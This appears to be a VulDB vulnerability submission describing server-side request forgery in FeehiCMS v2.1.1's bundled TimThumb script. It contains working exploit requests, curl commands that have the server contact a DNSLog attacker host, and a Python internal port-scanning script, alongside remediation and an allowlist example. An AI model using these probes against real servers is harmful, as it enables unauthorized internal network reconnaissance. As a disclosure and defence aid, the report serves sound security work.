| Title | FeehiCMS https://github.com/liufee/cms v2.1.1 Server-Side Request Forgery |
|---|
| Description | # Server-Side Request Forgery (SSRF) Vulnerability in FeehiCMS via TimThumb
**BUG_Author:** security_researcher
**Affected Version:** FeehiCMS v2.1.1 (TimThumb v2.8.13)
**Vendor:** [FeehiCMS GitHub Repository](https://github.com/liufee/cms)
**Software:** [FeehiCMS](https://github.com/liufee/cms)
**Vulnerability Files:**
- `frontend/web/timthumb.php`
---
## Description:
### 1. Vulnerability Overview
FeehiCMS v2.1.1 ships TimThumb v2.8.13, a PHP script that fetches, resizes and caches images. In FeehiCMS's default configuration TimThumb accepts arbitrary external URLs in its `src` parameter with no domain restriction, so an unauthenticated attacker can make the web server issue HTTP requests to hosts of the attacker's choosing, including hosts on the server's internal network. This is a Server-Side Request Forgery (SSRF, CWE-918) vulnerability.
### 2. Vulnerable Code
In `frontend/web/timthumb.php`, the following defaults at lines 31-32 of that file enable unrestricted fetching of external URLs:
```php
if(! defined('ALLOW_EXTERNAL') ) define ('ALLOW_EXTERNAL', TRUE);
if(! defined('ALLOW_ALL_EXTERNAL_SITES') ) define ('ALLOW_ALL_EXTERNAL_SITES', true);
```
- `ALLOW_EXTERNAL = TRUE`: permits `src` to reference images on external hosts rather than only local files
- `ALLOW_ALL_EXTERNAL_SITES = true`: bypasses the `$ALLOWED_SITES` whitelist entirely, so a request to ANY host is accepted
### 3. Exploitation
#### 3.1 Internal Port Scanning
**Request to scan MySQL port (3306):**
```
GET /timthumb.php?src=http://127.0.0.1:3306/ HTTP/1.1
Host: <target-ip>
```
**Response (confirms server attempted internal connection):**
```html
<h1>A TimThumb error has occured</h1>
The following error(s) occured:<br />
<ul><li>An error occured fetching image.</li></ul>
<br /><br />Query String : src=http://127.0.0.1:3306/
<br />TimThumb version : 2.8.13
```
This error message shows that the server attempted the fetch against `127.0.0.1:3306` and that the fetch did not complete. On its own it does not distinguish an open port from a closed one: a refused connection, a timeout and a non-HTTP service such as MySQL all end in the same `An error occured fetching image.` text. A port scan therefore relies on comparing responses across ports, i.e. the different error text returned when the remote side answers with HTTP (see the DNSLog step below) and the response time, since a refused connection fails immediately while a filtered port runs into TimThumb's fetch timeout.
#### 3.2 Fetching External Resources
**Request to fetch external image:**
```
GET /timthumb.php?src=http://httpbin.org/image/jpeg&w=200&h=200 HTTP/1.1
Host: <target-ip>
```
**Response:**
The server fetches the image from the external URL, resizes it to 200x200 and returns it to the attacker, which confirms that the server issues outbound requests to attacker-chosen hosts.
---
## Proof of Concept:
### Step 1: DNSLog Verification
Use a DNSLog platform to confirm that the server resolves, and therefore tries to reach, an attacker-controlled hostname.
1. Obtain a subdomain from http://dnslog.cn (e.g., `lldvq7.dnslog.cn`)
2. Send SSRF request:
```bash
curl "http://<target-ip>/timthumb.php?src=http://ssrf.lldvq7.dnslog.cn/test.jpg"
```
3. Check the DNSLog platform for DNS query records.
**Response:**
```html
<h1>A TimThumb error has occured</h1>
The following error(s) occured:<br />
<ul><li>The remote file is not a valid image. Mimetype = ''</li></ul>
<br /><br />Query String : src=http://ssrf.lldvq7.dnslog.cn/test.jpg
```
**DNSLog Result:** The platform shows a DNS query record for `ssrf.lldvq7.dnslog.cn`, confirming that the server resolved the attacker-controlled name. Note that the error text differs from the port-scan case: `The remote file is not a valid image. Mimetype = ''` means the fetch itself completed and the server received a response that was not an image, whereas `An error occured fetching image.` means the fetch never completed.

### Step 2: External Image Fetching
```bash
curl -o /tmp/ssrf_test.jpg "http://<target-ip>/timthumb.php?src=http://httpbin.org/image/jpeg&w=100&h=100"
file /tmp/ssrf_test.jpg
```
**Expected Result:**
```
/tmp/ssrf_test.jpg: JPEG image data, JFIF standard 1.01, 100x100, 7079 bytes
```
This confirms that the server fetched an image from an attacker-chosen external URL and resized it as requested.
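The probing described in sections 3.1 and 3.2 and in the PoC steps above, collected into one script. This is an added example, not code from FeehiCMS, TimThumb or the original report: it assumes the target exposes `/timthumb.php` as described, the function names are hypothetical, and `SAMPLE_RESPONSES` are constructed from the error text quoted in the report rather than captured traffic. The point it adds to the text is that a `fetch-failed` verdict is ambiguous, so the scan keeps the response time alongside the verdict.

```python
"""Probe helper for the timthumb.php SSRF. Added example; not project code.
Assumes /timthumb.php as in the report; names hypothetical; samples constructed."""
import time
import urllib.error
import urllib.request
from urllib.parse import parse_qs, urlencode, urlparse

# Error strings as TimThumb 2.8.13 emits them (the misspelling "occured" is
# TimThumb's own, so it is matched verbatim).
ERR_FETCH = "An error occured fetching image."
ERR_NOT_IMAGE = "The remote file is not a valid image."


def build_probe_url(target, src, w=None, h=None):
    """Build the request that makes the server fetch `src` (optionally resized)."""
    params = {"src": src}
    if w is not None:
        params["w"] = w
    if h is not None:
        params["h"] = h
    return f"http://{target}/timthumb.php?{urlencode(params)}"


def classify_response(content_type, body):
    """Map a timthumb.php response to what it reveals about the server's fetch.

    image-fetched       : the server fetched and served the remote resource
    connected-non-image : the remote host answered over HTTP, but not with an image
    fetch-failed        : the fetch did not complete; a closed port, a filtered
                          port, a DNS failure and a non-HTTP service all look alike
    """
    if content_type.startswith("image/"):
        return "image-fetched"
    if ERR_NOT_IMAGE in body:
        return "connected-non-image"
    if ERR_FETCH in body:
        return "fetch-failed"
    return "unknown"


def live_fetch(url, timeout=15.0):
    """Real fetch for authorized testing; returns (content_type, body, elapsed)."""
    started = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            ctype = resp.headers.get("Content-Type", "")
            raw = resp.read()
    except urllib.error.HTTPError as err:  # error page may carry a non-200 status
        ctype = err.headers.get("Content-Type", "") if err.headers else ""
        raw = err.read()
    body = "" if ctype.startswith("image/") else raw.decode("utf-8", "replace")
    return ctype, body, time.monotonic() - started


def scan_ports(target, host, ports, fetch=live_fetch):
    """Make the server connect to host:port for each port.

    Returns {port: (verdict, elapsed_seconds)}. The elapsed time is kept because
    "fetch-failed" is ambiguous: a refused connection fails fast, while a
    filtered port or a silent service runs into the server-side timeout.
    """
    results = {}
    for port in ports:
        url = build_probe_url(target, f"http://{host}:{port}/")
        ctype, body, elapsed = fetch(url)
        results[port] = (classify_response(ctype, body), round(elapsed, 3))
    return results


# Constructed sample responses keyed by probed port (not captured traffic),
# reusing the error text the report quotes.
SAMPLE_RESPONSES = {
    3306: ("text/html", "<h1>A TimThumb error has occured</h1><ul><li>"
           + ERR_FETCH + "</li></ul>", 0.021),
    8080: ("text/html", "<h1>A TimThumb error has occured</h1><ul><li>"
           + ERR_NOT_IMAGE + " Mimetype = 'text/html'</li></ul>", 0.048),
    4444: ("text/html", "<h1>A TimThumb error has occured</h1><ul><li>"
           + ERR_FETCH + "</li></ul>", 10.012),
}


def sample_fetch(url):
    """Offline stand-in for live_fetch that replays SAMPLE_RESPONSES."""
    src = parse_qs(urlparse(url).query)["src"][0]
    return SAMPLE_RESPONSES[urlparse(src).port]


if __name__ == "__main__":
    scan = scan_ports("203.0.113.10", "127.0.0.1", sorted(SAMPLE_RESPONSES),
                      fetch=sample_fetch)
    for port, verdict in scan.items():
        print(port, verdict)
```

Against a live target, pass the default `live_fetch` instead of `sample_fetch`; the 3306 and 4444 samples illustrate why the verdict alone is not enough, since both are `fetch-failed` and only the timing separates a refused connection from a timeout.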

## Remediation:
### Option 1: Disable External URL Fetching
Edit `frontend/web/timthumb.php` and change the default so that `src` may only reference local files:
```php
define ('ALLOW_EXTERNAL', FALSE);
```
### Option 2: Use Whitelist for Allowed Domains
If external images are required, keep the whitelist enabled and list only hosts you control:
```php
define ('ALLOW_EXTERNAL', TRUE);
define ('ALLOW_ALL_EXTERNAL_SITES', false);
$ALLOWED_SITES = array (
'your-trusted-domain.com',
'cdn.your-domain.com'
);
```
The entries are hostnames that are compared against the host of `src`; a whitelist is only effective when it is matched against the parsed hostname, not against the URL as a substring, and when it contains no domain on which untrusted users can create subdomains.
### Option 3: Remove TimThumb
Remove `frontend/web/timthumb.php` entirely and serve resized images through an image-processing component that reads only local or pre-validated files and never fetches URLs supplied by the client.
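What the whitelist in Option 2 has to enforce, shown as an added example that is not TimThumb's or FeehiCMS's code: a naive substring check (the pitfall) beside a check on the parsed hostname. The function names and the domains are hypothetical; the allowed list reuses the placeholder names from Option 2.

```python
"""Allowlist check for the `src` parameter. Added example; not project code.
Function names and domains are hypothetical."""
import ipaddress
from urllib.parse import urlparse

# Placeholder allowed hosts, mirroring the Option 2 configuration above.
ALLOWED_SITES = ["your-trusted-domain.com", "cdn.your-domain.com"]


def naive_allowed(src, allowed=ALLOWED_SITES):
    """The pitfall, for contrast only: a substring match on the whole URL
    accepts any URL that merely contains an allowed name somewhere."""
    return any(site in src for site in allowed)


def strict_allowed(src, allowed=ALLOWED_SITES):
    """Accept only http(s) URLs whose parsed hostname is an allowed site or a
    subdomain of one. IP literals, empty hosts and other schemes are rejected,
    and userinfo tricks (allowed.com@evil) fail because urlparse().hostname
    returns the real host."""
    parts = urlparse(src)
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False
    try:
        ipaddress.ip_address(host)  # an IP literal is never an allowlisted name
        return False
    except ValueError:
        pass
    return any(host == site or host.endswith("." + site) for site in allowed)


if __name__ == "__main__":
    # Constructed probe URLs: two legitimate, the rest attempts to slip past.
    for url in ["https://cdn.your-domain.com/a.jpg",
                "http://img.your-trusted-domain.com/b.png",
                "http://127.0.0.1:3306/",
                "http://your-trusted-domain.com.evil.example/x.jpg",
                "http://evil.example/your-trusted-domain.com.jpg",
                "http://your-trusted-domain.com@evil.example/",
                "file:///etc/passwd"]:
        print(f"{url:55} naive={naive_allowed(url)!s:5} strict={strict_allowed(url)}")
```

Hostname matching does not stop an allowed name from resolving to an internal address; where that matters, resolve the name and check the resulting address against private and loopback ranges before fetching.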
---
## References:
- [TimThumb Vulnerabilities History](https://blog.sucuri.net/2011/08/timthumb-security-vulnerability-list.html)
- [OWASP SSRF Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)
- [CWE-918: Server-Side Request Forgery (SSRF)](https://cwe.mitre.org/data/definitions/918.html)
---
## Timeline:
- **Discovery Date:** 2025-12-18
- **Vendor Notification:** Pending
- **Public Disclosure:** Pending
---
## Disclaimer:
This vulnerability report is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing for vulnerabilities. |
|---|
| User | hiro (UID 93548) |
|---|
| Submission | 18.12.2025 03:14 (6 months ago) |
|---|
| Moderation | 29.12.2025 16:25 (12 days later) |
|---|
| Status | accepted |
|---|
| VulDB Entry | 338663 [FeehiCMS up to 2.1.1 TimThumb timthumb.php src privilege escalation] |
|---|
| Points | 17 |
|---|